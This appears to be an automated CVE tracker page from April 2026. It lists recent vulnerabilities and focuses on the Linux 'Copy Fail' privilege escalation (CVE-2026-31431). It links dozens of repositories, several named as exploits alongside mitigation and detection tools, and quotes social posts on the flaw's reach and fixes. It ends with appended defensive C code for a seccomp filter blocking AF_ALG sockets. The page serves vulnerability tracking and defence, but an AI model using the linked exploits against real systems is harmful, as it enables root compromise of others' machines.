## Updated at UTC 2026-04-30T12:16:00.090022

| CVE | CVSS | EPSS | Posts | Repos | Nuclei | Updated | Description |
|---|---|---|---|---|---|---|---|
| CVE-2026-31431 | 7.8 | 0.01% | 103 | 68 | | 2026-04-30T11:16:20.723000 | In the Linux kernel, the following vulnerability has been resolved: crypto: alg |
| CVE-2026-39457 | None | 0.00% | 2 | 0 | | 2026-04-30T09:30:32 | When exchanging data over a socket, libnv uses select(2) to wait for data to arr |
| CVE-2026-7270 | None | 0.00% | 2 | 0 | | 2026-04-30T09:30:32 | An operator precedence bug in the kernel results in a scenario where a buffer ov |
| CVE-2026-7164 | None | 0.00% | 2 | 0 | | 2026-04-30T09:30:32 | Incorrect packet validation allowed unbounded recursion parsing SCTP chunk param |
| CVE-2026-5402 | 8.8 | 0.00% | 2 | 0 | | 2026-04-30T09:30:31 | TLS protocol dissector heap overflow in Wireshark 4.6.0 to 4.6.4 allows denial o |
| CVE-2026-42511 | None | 0.00% | 2 | 0 | | 2026-04-30T09:30:31 | The BOOTP file field is written to the lease file without escaping embedded doub |
| CVE-2026-42512 | 0 | 0.00% | 2 | 0 | | 2026-04-30T09:16:03.373000 | As dhclient is building an environment to pass to dhclient-script, it may need t |
| CVE-2026-35547 | 0 | 0.00% | 2 | 0 | | 2026-04-30T09:16:03.167000 | When processing the header of an incoming message, libnv failed to properly vali |
| CVE-2026-5201 | 7.5 | 0.09% | 1 | 1 | | 2026-04-30T08:16:07.410000 | A flaw was found in the gdk-pixbuf library. This heap-based buffer overflow vuln |
| CVE-2026-7470 | 8.8 | 0.00% | 2 | 0 | | 2026-04-30T03:16:01.740000 | A flaw has been found in Tenda 4G300 US_4G300V1.0Mt_V1.01.42_CN_TDC01. Affected |
| CVE-2026-41940 | 9.8 | 0.00% | 14 | 8 | template | 2026-04-30T01:16:02.837000 | cPanel and WHM versions after 11.40 contain an authentication bypass vulnerabili |
| CVE-2026-7420 | 8.8 | 0.00% | 2 | 0 | | 2026-04-30T00:31:28 | A security flaw has been discovered in UTT HiPER 1250GW up to 3.2.7-210907-18053 |
| CVE-2026-7419 | 8.8 | 0.00% | 2 | 0 | | 2026-04-30T00:31:28 | A vulnerability was identified in UTT HiPER 1250GW up to 3.2.7-210907-180535. Th |
| CVE-2026-7424 | 8.1 | 0.00% | 2 | 0 | | 2026-04-29T23:16:20.367000 | Integer underflow in the DHCPv6 sub-option parser in FreeRTOS-Plus-TCP before V4 |
| CVE-2026-7418 | 8.8 | 0.00% | 2 | 0 | | 2026-04-29T22:16:22.620000 | A vulnerability was determined in UTT HiPER 1250GW up to 3.2.7-210907-180535. Th |
| CVE-2026-34965 | 8.8 | 0.00% | 2 | 0 | | 2026-04-29T21:31:37 | Cockpit CMS contains an authenticated remote code execution vulnerability in the |
| CVE-2026-42515 | 0 | 0.05% | 1 | 0 | | 2026-04-29T21:14:23.977000 | This vulnerability exists in e-Sushrut due to improper access control in resourc |
| CVE-2026-5166 | 9.6 | 0.00% | 4 | 0 | | 2026-04-29T21:13:30.563000 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') v |
| CVE-2026-30893 | 9.0 | 0.00% | 3 | 0 | | 2026-04-29T20:16:29.660000 | Wazuh is a free and open source platform used for threat prevention, detection, |
| CVE-2026-7466 | 8.8 | 0.00% | 2 | 0 | | 2026-04-29T19:16:27.013000 | AgentFlow contains an arbitrary code execution vulnerability that allows attacke |
| CVE-2026-0204 | 8.0 | 0.00% | 1 | 0 | | 2026-04-29T18:31:42 | A vulnerability in the access control mechanism of SonicOS may allow certain man |
| CVE-2026-6849 | 8.8 | 0.00% | 1 | 1 | | 2026-04-29T18:31:41 | Improper neutralization of special elements used in an OS command ('OS command i |
| CVE-2026-5712 | 8.0 | 0.00% | 1 | 0 | | 2026-04-29T18:16:05.180000 | This vulnerability impacts all versions of IdentityIQ and allows an authenticate |
| CVE-2026-42167 | 8.1 | 0.24% | 4 | 2 | template | 2026-04-29T16:16:25.303000 | mod_sql in ProFTPD before 1.3.10rc1 allows remote attackers to execute arbitrary |
| CVE-2026-7344 | 8.8 | 0.01% | 1 | 0 | | 2026-04-29T15:31:44 | Use after free in Accessibility in Google Chrome on Windows prior to 147.0.7727. |
| CVE-2026-7343 | 9.8 | 0.03% | 1 | 0 | | 2026-04-29T15:31:43 | Use after free in Views in Google Chrome on Windows prior to 147.0.7727.138 allo |
| CVE-2026-42523 | 9.0 | 0.00% | 3 | 0 | | 2026-04-29T15:16:07.077000 | Jenkins GitHub Plugin 1.46.0 and earlier improperly processes the current job UR |
| CVE-2026-5760 | 9.8 | 0.38% | 1 | 1 | | 2026-04-29T14:16:19.920000 | SGLang's reranking endpoint (/v1/rerank) achieves Remote Code Execution (RCE) wh |
| CVE-2026-7321 | 9.6 | 0.04% | 1 | 0 | | 2026-04-29T06:16:08.357000 | Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking co |
| CVE-2026-42615 | 7.2 | 0.01% | 2 | 0 | | 2026-04-29T04:16:41.750000 | GCHQ CyberChef before 11.0.0 allows XSS via Show Base64 offsets, as demonstrated |
| CVE-2026-23773 | 4.3 | 0.01% | 1 | 0 | | 2026-04-29T04:16:40.867000 | Dell Disk Library for Mainframe, version(s) DLm 8700/2700 contain(s) a Server-Si |
| CVE-2026-41873 | 9.8 | 0.12% | 1 | 0 | | 2026-04-29T00:31:25 | ** UNSUPPORTED WHEN ASSIGNED ** Inconsistent Interpretation of HTTP Requests ('H |
| CVE-2026-32202 | 4.3 | 7.19% | 7 | 1 | | 2026-04-28T21:47:02.087000 | Protection mechanism failure in Windows Shell allows an unauthorized attacker to |
| CVE-2024-1708 | 8.4 | 81.62% | 4 | 3 | | 2026-04-28T21:44:53.770000 | ConnectWise ScreenConnect 23.9.7 and prior are affected by path-traversal vulner |
| CVE-2026-25874 | 9.8 | 0.11% | 3 | 0 | | 2026-04-28T21:37:03 | LeRobot contains an unsafe deserialization vulnerability in the async inference |
| CVE-2026-24222 | 8.6 | 0.04% | 2 | 0 | | 2026-04-28T21:36:23 | NVIDIA NeMoClaw contains a vulnerability in the sandbox environment initializati |
| CVE-2026-24231 | 6.3 | 0.01% | 1 | 0 | | 2026-04-28T21:36:22 | NVIDIA NemoClaw contains a vulnerability in the validateEndpointUrl() SSRF prote |
| CVE-2026-7289 | 8.8 | 0.04% | 1 | 0 | | 2026-04-28T20:25:44.987000 | A vulnerability was found in D-Link DIR-825M 1.1.12. This issue affects the func |
| CVE-2026-7288 | 8.8 | 0.04% | 1 | 0 | | 2026-04-28T20:25:44.987000 | A vulnerability has been found in D-Link DIR-825M 1.1.12. This vulnerability aff |
| CVE-2026-38651 | 8.2 | 0.04% | 1 | 0 | | 2026-04-28T20:23:20.703000 | Authentication Bypass vulnerability exists in Netmaker versions prior to 1.5.0. |
| CVE-2026-7279 | 7.8 | 0.01% | 1 | 0 | | 2026-04-28T20:22:38.260000 | AVACAST developed by eMPIA Technology, has a DLL Hijacking vulnerability, allowi |
| CVE-2025-67223 | 7.5 | 0.13% | 1 | 1 | | 2026-04-28T20:18:13.020000 | The Aranda File Server (AFS) component in Aranda Software Aranda Service Desk be |
| CVE-2026-40976 | 9.1 | 0.04% | 1 | 0 | | 2026-04-28T20:11:56.713000 | In certain circumstances, Spring Boot's default web security is ineffective allo |
| CVE-2026-24186 | 8.8 | 0.06% | 2 | 0 | | 2026-04-28T20:10:42.070000 | NVIDIA FLARE SDK contains a vulnerability in FOBS, where an attacker may cause |
| CVE-2026-24178 | 9.8 | 0.14% | 2 | 0 | | 2026-04-28T20:10:42.070000 | NVIDIA NVFlare Dashboard contains a vulnerability in the user management and aut |
| CVE-2026-24204 | 6.5 | 0.04% | 1 | 0 | | 2026-04-28T20:10:42.070000 | NVIDIA Flare SDK contains a vulnerability where an Attacker may cause an Imprope |
| CVE-2026-3893 | 9.4 | 0.06% | 1 | 0 | | 2026-04-28T20:10:23.367000 | The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism, allowing a |
| CVE-2026-41384 | 7.8 | 0.01% | 1 | 0 | | 2026-04-28T20:10:23.367000 | OpenClaw before 2026.3.24 contains an environment variable injection vulnerabili |
| CVE-2026-41383 | 8.1 | 0.04% | 1 | 0 | | 2026-04-28T20:10:23.367000 | OpenClaw before 2026.4.2 contains an arbitrary directory deletion vulnerability |
| CVE-2026-41394 | 8.2 | 0.05% | 1 | 0 | | 2026-04-28T20:10:23.367000 | OpenClaw before 2026.3.31 contains an authentication bypass vulnerability where |
| CVE-2026-41396 | 7.8 | 0.01% | 1 | 0 | | 2026-04-28T20:10:23.367000 | OpenClaw before 2026.3.31 allows workspace .env files to override the OPENCLAW_B |
| CVE-2026-41912 | 7.6 | 0.03% | 1 | 0 | | 2026-04-28T20:10:23.367000 | OpenClaw before 2026.4.8 contains a server-side request forgery policy bypass vu |
| CVE-2026-42426 | 8.8 | 0.03% | 1 | 0 | | 2026-04-28T20:10:23.367000 | OpenClaw before 2026.4.8 contains an improper authorization vulnerability where |
| CVE-2026-42423 | 7.5 | 0.04% | 1 | 0 | | 2026-04-28T20:10:23.367000 | OpenClaw before 2026.4.8 contains an approval-timeout fallback mechanism that by |
| CVE-2026-42431 | 8.1 | 0.03% | 1 | 0 | | 2026-04-28T20:10:23.367000 | OpenClaw before 2026.4.8 contains a security bypass vulnerability in node.invoke |
| CVE-2026-40473 | 8.8 | 0.11% | 1 | 1 | | 2026-04-28T19:43:05.663000 | The camel-mina component's MinaConverter.toObjectInput(IoBuffer) type converter |
| CVE-2026-3854 | 8.8 | 0.35% | 30 | 4 | | 2026-04-28T19:37:39.507000 | An improper neutralization of special elements vulnerability was identified in G |
| CVE-2026-7320 | 7.5 | 0.03% | 1 | 0 | | 2026-04-28T18:31:36 | Information disclosure due to incorrect boundary conditions in the Audio/Video c |
| CVE-2026-42432 | None | 0.02% | 1 | 0 | | 2026-04-28T18:30:39 | ## Impact Node Pairing Reconnect Command Escalation Bypasses operator.admin Sco |
| CVE-2026-42422 | None | 0.04% | 1 | 0 | | 2026-04-28T18:28:01 | ## Impact OpenClaw `device.token.rotate` mints tokens for unapproved roles, byp |
| CVE-2026-41914 | None | 0.03% | 1 | 0 | | 2026-04-28T18:26:36 | ## Impact QQ Bot Extension: Missing SSRF Protection on All Media Fetch Paths. |
| CVE-2026-41405 | None | 0.14% | 1 | 0 | | 2026-04-28T18:24:06 | ## Summary MS Teams webhook parses body before JWT validation, enabling unauthen |
| CVE-2026-41404 | None | 0.07% | 1 | 0 | | 2026-04-28T18:23:43 | ## Summary Incomplete scope-clearing fix allows operator.admin escalation via tr |
| CVE-2026-41399 | None | 0.05% | 1 | 0 | | 2026-04-28T18:22:28 | ## Summary The gateway accepted unbounded concurrent unauthenticated WebSocket |
| CVE-2026-41395 | None | 0.02% | 1 | 0 | | 2026-04-28T18:21:09 | ## Summary Plivo V3 signature verification canonicalized query ordering, but re |
| CVE-2026-41387 | 9.7 | 0.02% | 1 | 0 | | 2026-04-28T18:18:46 | ## Summary Host exec env override sanitization did not fail closed for several |
| CVE-2026-41386 | None | 0.03% | 1 | 0 | | 2026-04-28T18:18:23 | ## Summary Bootstrap setup codes were not bound to the intended device role and |
| CVE-2026-41378 | None | 0.18% | 1 | 0 | | 2026-04-28T18:15:32 | ## Summary Paired node escalates to gateway RCE via unrestricted node.event agen |
| CVE-2026-41602 | 7.5 | 0.13% | 1 | 0 | | 2026-04-28T15:31:54 | Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport G |
| CVE-2026-27760 | 8.1 | 0.10% | 1 | 0 | | 2026-04-28T15:30:58 | OpenCATS prior to commit 3002a29 contains a PHP code injection vulnerability in |
| CVE-2026-5944 | 8.2 | 0.09% | 1 | 0 | | 2026-04-28T15:30:52 | An improper access control vulnerability exists in the Cisco Intersight Device C |
| CVE-2026-3323 | 7.5 | 0.01% | 1 | 0 | | 2026-04-28T12:31:36 | An unsecured configuration interface on affected devices allows unauthenticated |
| CVE-2026-35431 | 10.0 | 0.09% | 1 | 0 | | 2026-04-28T12:10:53.103000 | Server-side request forgery (ssrf) in Microsoft Entra ID Entitlement Management |
| CVE-2026-5450 | 9.8 | 0.05% | 1 | 0 | | 2026-04-23T15:33:34.277000 | Calling the scanf family of functions with a %mc (malloc'd character match) in t |
| CVE-2026-3844 | 9.8 | 0.08% | 1 | 5 | template | 2026-04-23T04:00:28 | The Breeze Cache plugin for WordPress is vulnerable to arbitrary file uploads du |
| CVE-2026-5588 | 0 | 0.01% | 1 | 0 | | 2026-04-21T16:16:20.540000 | Use of a Broken or Risky Cryptographic Algorithm vulnerability in Legion of the |
| CVE-2026-33626 | 7.5 | 0.04% | 1 | 0 | | 2026-04-21T15:04:13 | ## Summary A Server-Side Request Forgery (SSRF) vulnerability exists in LMDeplo |
| CVE-2026-20147 | 9.9 | 0.28% | 1 | 0 | | 2026-04-17T15:09:46.880000 | A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, rem |
| CVE-2025-61260 | 9.8 | 0.10% | 1 | 0 | | 2026-04-16T22:56:43 | A vulnerability was identified in OpenAI Codex CLI v0.23.0 and before that enabl |
| CVE-2026-34197 | 8.8 | 65.07% | 1 | 9 | template | 2026-04-16T21:49:17 | Improper Input Validation, Improper Control of Generation of Code ('Code Injecti |
| CVE-2026-20148 | 4.9 | 0.06% | 1 | 0 | | 2026-04-15T18:32:03 | A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, rem |
| CVE-2026-26157 | 7.0 | 0.01% | 1 | 0 | | 2026-04-15T00:35:42.020000 | A flaw was found in BusyBox. Incomplete path sanitization in its archive extract |
| CVE-2025-46811 | 9.8 | 0.10% | 1 | 1 | | 2026-04-15T00:35:42.020000 | A Missing Authorization vulnerability in SUSE Linux Manager allows anyone with t |
| CVE-2026-35414 | 4.2 | 0.02% | 1 | 2 | | 2026-04-10T19:36:57.163000 | OpenSSH before 10.3 mishandles the authorized_keys principals option in uncommon |
| CVE-2025-8065 | 6.5 | 0.08% | 2 | 0 | | 2026-04-03T18:31:04 | A buffer overflow vulnerability exists in the ONVIF XML parser of Tapo C200 V3. |
| CVE-2026-25047 | None | 0.02% | 1 | 1 | | 2026-02-27T20:45:41 | ### Summary A prototype pollution vulnerability exists in version 1.0.7 of the d |
| CVE-2026-26335 | 9.8 | 0.13% | 1 | 1 | | 2026-02-26T22:45:37.080000 | Calero VeraSMART versions prior to 2022 R1 use static ASP.NET/IIS machineKey val |
| CVE-2025-69985 | 9.8 | 0.92% | 1 | 2 | | 2026-02-26T19:39:20.677000 | FUXA 1.2.8 and prior contains an Authentication Bypass vulnerability leading to |
| CVE-2026-2441 | 8.8 | 0.41% | 1 | 11 | | 2026-02-23T13:24:55.920000 | Use after free in CSS in Google Chrome prior to 145.0.7632.75 allowed a remote a |
| CVE-2026-25961 | 7.5 | 0.03% | 1 | 1 | | 2026-02-20T20:22:32.817000 | SumatraPDF is a multi-format reader for Windows. In 3.5.0 through 3.5.2, Sumatra |
| CVE-2026-26235 | 7.5 | 0.40% | 1 | 1 | | 2026-02-20T19:52:03.777000 | JUNG Smart Visu Server 1.1.1050 contains a denial of service vulnerability that |
| CVE-2026-24486 | 8.6 | 0.03% | 1 | 0 | | 2026-02-17T20:44:50.210000 | Python-Multipart is a streaming multipart parser for Python. Prior to version 0. |
| CVE-2025-24054 | 6.5 | 7.83% | 2 | 11 | | 2026-02-13T21:25:23.527000 | External control of file name or path in Windows NTLM allows an unauthorized att |
| CVE-2026-21248 | 7.3 | 0.03% | 1 | 0 | | 2026-02-11T20:15:17.870000 | Heap-based buffer overflow in Windows Hyper-V allows an authorized attacker to e |
| CVE-2026-25732 | 7.5 | 0.08% | 1 | 1 | | 2026-02-07T00:31:59 | ### Summary NiceGUI's `FileUpload.name` property exposes client-supplied filenam |
| CVE-2025-12383 | None | 0.04% | 1 | 0 | | 2026-02-05T15:43:37 | In Eclipse Jersey versions 2.45, 3.0.16, 3.1.9 a race condition can cause ignori |
| CVE-2026-25130 | 9.7 | 0.04% | 1 | 1 | | 2026-01-31T03:53:47 | ## Summary The CAI (Cybersecurity AI) framework contains multiple argument inje |
| CVE-2025-68705 | None | 0.04% | 1 | 1 | | 2026-01-07T21:34:38 | # RustFS Path Traversal Vulnerability ## Vulnerability Details - **CVE ID**: |
| CVE-2025-68161 | None | 0.03% | 1 | 0 | | 2025-12-19T22:08:03 | The Socket Appender in Apache Log4j Core versions 2.0-beta9 through 2.25.2 does |
| CVE-2025-48924 | 6.5 | 0.04% | 1 | 1 | | 2025-11-05T20:30:33 | Uncontrolled Recursion vulnerability in Apache Commons Lang. This issue affects |
| CVE-2025-59250 | 8.1 | 0.08% | 1 | 0 | | 2025-10-30T16:35:42.213000 | Improper input validation in JDBC Driver for SQL Server allows an unauthorized a |
| CVE-2019-1367 | 7.5 | 90.77% | 1 | 1 | | 2025-10-22T00:32:47 | A remote code execution vulnerability exists in the way that the scripting engin |
| CVE-2025-59536 | None | 0.03% | 1 | 5 | | 2025-10-03T14:16:36 | Due to a bug in the startup trust dialog implementation, Claude Code could be tr |
| CVE-2025-54136 | 7.2 | 0.11% | 1 | 1 | | 2025-08-25T01:41:36.580000 | Cursor is a code editor built for programming with AI. In versions 1.2.4 and bel |
| CVE-2025-47987 | 7.8 | 0.53% | 1 | 1 | | 2025-07-14T17:38:41.223000 | Heap-based buffer overflow in Windows Cred SSProvider Protocol allows an authori |
| CVE-2024-46987 | 7.7 | 24.00% | 1 | 10 | | 2025-04-17T19:15:59.520000 | Camaleon CMS is a dynamic and advanced content management system based on Ruby o |
| CVE-2025-29787 | None | 0.33% | 1 | 0 | | 2025-03-19T15:51:05 | ### Summary In the archive extraction routine of affected versions of the `zip |
| CVE-2024-28397 | 8.8 | 65.10% | 1 | 16 | template | 2024-08-04T05:01:02 | An issue in the component `js2py.disable_pyimport()` of js2py up to v0.74 allows |
| CVE-2026-25643 | 0 | 0.39% | 1 | 3 | | N/A | |
| CVE-2026-42238 | 0 | 0.00% | 2 | 0 | | N/A | |
| CVE-2026-24897 | 0 | 0.19% | 1 | 0 | | N/A | |
| CVE-2026-42208 | 0 | 0.00% | 7 | 1 | | N/A | |
| CVE-2026-26015 | 0 | 0.00% | 2 | 0 | | N/A | |
| CVE-2026-7426 | 0 | 0.00% | 2 | 0 | | N/A | |
| CVE-2026-25262 | 0 | 0.00% | 1 | 0 | | N/A | |
| CVE-2026-5545 | 0 | 0.00% | 1 | 0 | | N/A | |
| CVE-2026-6253 | 0 | 0.00% | 1 | 0 | | N/A | |
| CVE-2026-7168 | 0 | 0.00% | 1 | 0 | | N/A | |
| CVE-2026-6429 | 0 | 0.00% | 1 | 0 | | N/A | |
| CVE-2026-41649 | 0 | 0.03% | 1 | 0 | | N/A | |

CVE-2026-31431
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-30T11:16:20.723000

103 posts

In the Linux kernel, the following vulnerability has been resolved: crypto: algif_aead - Revert to operating out-of-place This mostly reverts commit 72548b093ee3 except for the copying of the associated data. There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just

68 repos

https://github.com/eleveni386/CVE-2026-31431-Golang

https://github.com/mgmlme/cve_2026_31431_live-mitigation

https://github.com/Alfredooe/CVE-2026-31431

https://github.com/Aurillium/RootRemover

https://github.com/arkdev1/check-cve-2026-31431

https://github.com/ruattd/cve-2026-31431

https://github.com/adampielak/CVE-2026-31431_SCA_WAZUH

https://github.com/Isw-9/copy-fail-cve-2026-31431-aarch64

https://github.com/painoob/Copy-Fail-Exploit-CVE-2026-31431

https://github.com/someCorp/copyFail-CVE-2026-31431-workaround-bash

https://github.com/0xBlackash/CVE-2026-31431

https://github.com/jmac774/CVE-2026-31431-mitigation-rhel

https://github.com/TikoTikTok/copy-fail-cve-2026-31431

https://github.com/JnamerZ/CopyFail-CVE-2026-31431

https://github.com/G01d3nW01f/CVE-2026-31431

https://github.com/dorianhhuc/CVE-2026-31431

https://github.com/yandex-cloud-examples/yc-mk8s-copy-fail-mitigation

https://github.com/wuwu001/CVE-2026-31431-exploit

https://github.com/Y5neKO/copy-fail-CVE-2026-31431-universal

https://github.com/nisec-eric/cve-2026-31431

https://github.com/dicatalin/Copy_Fail_CVE-2026-31431_test_and_fix

https://github.com/H1d3r/copy-fail_LPE_Interactive

https://github.com/dixyes/fuck_cve_2026_31431

https://github.com/lonelyor/CVE-2026-31431-exp

https://github.com/wuzuowei/copy-fail-CVE-2026-31431

https://github.com/insomnisec/Detections-CVE-2026-31431

https://github.com/b5null/CVE-2026-31431-C

https://github.com/theori-io/copy-fail-CVE-2026-31431

https://github.com/freelabz/CVE-2026-31431

https://github.com/twowb/CVE-2026-31431-

https://github.com/gmeghnag/TEST-CVE-2026-31431

https://github.com/guard-wait/CVE-2026-31431_EXP

https://github.com/novysodope/copy-fail-CVE-2026-31431-C

https://github.com/desultory/CVE-2026-31431

https://github.com/gubaiovo/CVE-2026-31431

https://github.com/adysec/cve-2026-31431

https://github.com/slauger/CVE-2026-31431

https://github.com/jiangban046-spec/CVE-2026-31431-exploit_py2_py3

https://github.com/rootsecdev/cve_2026_31431

https://github.com/Phalanx-CCS/Copy-Fail

https://github.com/tgies/copy-fail-c

https://github.com/badsectorlabs/copyfail-go

https://github.com/Sndav/CVE-2026-31431-Advanced-Exploit

https://github.com/amdisrar/cve-2026-31431-mitigation

https://github.com/jbiniek/copy.fail-mitigation-MLM

https://github.com/rio128128/copy-fail-CVE-2026-31431

https://github.com/WavesMan/cve-2026-31431-fleet-remediator

https://github.com/Webhosting4U/Copy-Fail_Detect_and_mitigate_CVE-2026-31431

https://github.com/shadowabi/CVE-2026-31431-CopyFail-Universal-LPE

https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kubernetes-PoC

https://github.com/makitos666/CVE-2026-31431-Copy-Fail-Detection-Toolkit

https://github.com/vishwanathakuthota/copy-fail-CVE-2026-31431

https://github.com/Linux-zs/cve-2026-31431-mitigation

https://github.com/bigwario/copy-fail-CVE-2026-31431-C

https://github.com/0xShe/CVE-2026-31431

https://github.com/kadir/copy-fail-CVE-2026-31431-IOC

https://github.com/ZephrFish/CopyFail-CVE-2026-31431

https://github.com/pascal-gujer/CVE-2026-31431

https://github.com/luotian2/CVE-2026-31431

https://github.com/ryan2929/CVE-2026-31431

https://github.com/yiyihuohuo/CVE-2026-31431

https://github.com/thrandomv/cve-2026-31431-detection

https://github.com/NichiyaOba/linux-vuln-CVE-2026-31431

https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Statically-PoC

https://github.com/mrowkoob/copy-fail-mitigate-no-reboot

https://github.com/iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail

https://github.com/Crihexe/copy-fail-tiny-elf-CVE-2026-31431

https://github.com/Theori-lO/copy-fail-CVE-2026-31431

jcrabapple@dmv.community at 2026-04-30T11:50:41.000Z ##

Copy Fail — CVE-2026-31431

copy.fail/

##

CuratedHackerNews@mastodon.social at 2026-04-30T11:39:04.000Z ##

Copy-fail-destroyer: K8s remediation for CVE-2026-31431

github.com/NorskHelsenett/copy

#github #k8s

##

Natanox@chaos.social at 2026-04-30T11:16:58.000Z ##

@yuka Debian is uncomfortably slow pushing the fix.
security-tracker.debian.org/tr

##

harld@masto.ai at 2026-04-30T11:04:20.000Z ##

Still pretty impressive what hackers manage to find.

'Most Linux LPEs need a race window or a kernel-specific offset. Copy Fail is a straight-line logic flaw — it needs neither. The same 732-byte Python script roots every Linux distribution shipped since 2017.'

"Copy Fail — CVE-2026-31431"

copy.fail/

##

beyondmachines1 at 2026-04-30T11:01:29.165Z ##

Copy Fail: Linux Kernel Flaw Grants Root Access On All Major Distributions

A Linux kernel vulnerability called "Copy Fail" (CVE-2026-31431) allows unprivileged local users to gain root privileges with 100% reliability by corrupting the shared page cache. The flaw affects nearly all Linux distributions since 2017 and enables container escapes because the memory corruption does not modify files on disk.

**If you run Linux servers, especially shared environments like Kubernetes clusters, CI/CD runners, or multi-tenant hosts, patch your kernel immediately to a version that includes the fix (mainline commit a664bf3d603d) for CVE-2026-31431. If you can't patch right away, disable the vulnerable module by running echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf followed by rmmod algif_aead, and for untrusted code environments block AF_ALG socket creation via seccomp as a long-term safeguard.**

beyondmachines.net/event_detai

##
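
The seccomp safeguard the post above recommends for untrusted-code environments, as an added example (editor's code, not from the page, the post's author, or any of the linked repositories). It builds a seccomp-BPF filter that makes socket(AF_ALG, ...) fail with EPERM, includes a small cBPF interpreter so the filter's decisions can be checked before it is installed, and a probe that opens and binds an AF_ALG "aead" socket to see whether algif_aead is still reachable (useful for verifying the modprobe blacklist from the post as well). Assumptions: x86_64 or aarch64 Linux, and the algorithm name "gcm(aes)" used by the probe.

```c
/* Added example: seccomp-BPF filter denying AF_ALG sockets, plus an offline simulator
 * and a reachability probe for the algif_aead surface. Build: cc -O2 -o deny_af_alg deny_af_alg.c */
#define _GNU_SOURCE
#include <errno.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/if_alg.h>
#include <linux/seccomp.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <unistd.h>

#ifndef AF_ALG
#define AF_ALG 38                                  /* kernel crypto user-space API family */
#endif
#ifndef SECCOMP_RET_KILL_PROCESS
#define SECCOMP_RET_KILL_PROCESS SECCOMP_RET_KILL  /* pre-4.14 headers */
#endif
#if defined(__x86_64__)
#define FILTER_ARCH AUDIT_ARCH_X86_64
#elif defined(__aarch64__)
#define FILTER_ARCH AUDIT_ARCH_AARCH64
#else
#error "add the AUDIT_ARCH_* constant for this architecture"
#endif
#define DENY_EPERM (SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA))

/* Deny socket() whose first argument (the address family) is AF_ALG; allow everything else.
 * The arch check comes first so a process of another ABI cannot alias syscall numbers;
 * args[0] is read as its low 32 bits (both supported arches are little-endian). */
static struct sock_filter af_alg_filter[] = {
    BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, FILTER_ARCH, 1, 0),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL_PROCESS),
    BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, SYS_socket, 0, 3),        /* not socket(): allow */
    BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, args[0])),
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AF_ALG, 0, 1),            /* other family: allow */
    BPF_STMT(BPF_RET | BPF_K, DENY_EPERM),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
};
#define AF_ALG_FILTER_LEN (sizeof(af_alg_filter) / sizeof(af_alg_filter[0]))

/* Offline interpreter for the three cBPF instruction kinds the filter uses; returns the
 * SECCOMP_RET_* action the kernel would take for (arch, syscall nr, first argument). */
uint32_t simulate_filter(uint32_t arch, uint32_t nr, uint64_t arg0)
{
    struct seccomp_data d = { .nr = (int)nr, .arch = arch };
    d.args[0] = arg0;
    const unsigned char *mem = (const unsigned char *)&d;
    uint32_t acc = 0;
    for (size_t pc = 0; pc < AF_ALG_FILTER_LEN; pc++) {
        const struct sock_filter *ins = &af_alg_filter[pc];
        switch (ins->code) {
        case BPF_LD | BPF_W | BPF_ABS:
            memcpy(&acc, mem + ins->k, sizeof acc);               /* load a 32-bit field */
            break;
        case BPF_JMP | BPF_JEQ | BPF_K:
            pc += (acc == ins->k) ? ins->jt : ins->jf;            /* relative forward jump */
            break;
        case BPF_RET | BPF_K:
            return ins->k;
        default:
            return SECCOMP_RET_KILL_PROCESS;                      /* unsupported: fail closed */
        }
    }
    return SECCOMP_RET_KILL_PROCESS;                              /* fell off the end */
}

/* Install the filter for this process and everything it later execs. NO_NEW_PRIVS lets an
 * unprivileged caller install it and also stops setuid binaries from regaining privilege. */
int deny_af_alg(void)
{
    struct sock_fprog prog = { .len = AF_ALG_FILTER_LEN, .filter = af_alg_filter };
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0) return -1;
    if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) != 0) return -1;
    return 0;
}

/* 0 if an AF_ALG aead socket can be opened and bound (algif_aead reachable); otherwise the
 * errno: EPERM under the filter, ENOENT when the aead type cannot be bound (module
 * blacklisted as in the post above, or no gcm(aes) in this kernel). */
int probe_af_alg_aead(void)
{
    struct sockaddr_alg sa = { .salg_family = AF_ALG, .salg_type = "aead",
                               .salg_name = "gcm(aes)" };          /* algorithm name: assumption */
    int fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
    if (fd < 0) return errno;
    int err = bind(fd, (struct sockaddr *)&sa, sizeof sa) < 0 ? errno : 0;
    close(fd);
    return err;
}

int main(int argc, char **argv)
{
    printf("before filter: probe=%d (0 means algif_aead is reachable)\n", probe_af_alg_aead());
    if (deny_af_alg() != 0) { perror("seccomp"); return 1; }
    printf("after filter:  probe=%d (EPERM=%d)\n", probe_af_alg_aead(), EPERM);
    if (argc > 1) { execv(argv[1], argv + 1); perror("execv"); return 1; }  /* run a workload under it */
    return 0;
}
```

Run it with no arguments to see the probe result before and after the filter, or as `./deny_af_alg /bin/sh` to start a shell in which AF_ALG sockets cannot be created. Because the filter keys on the first argument of socket(2), it blocks the algif_aead path regardless of whether the module is built in, which is the case the post's modprobe rule cannot cover; the simulator exists so the jump offsets can be verified without touching the running process.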

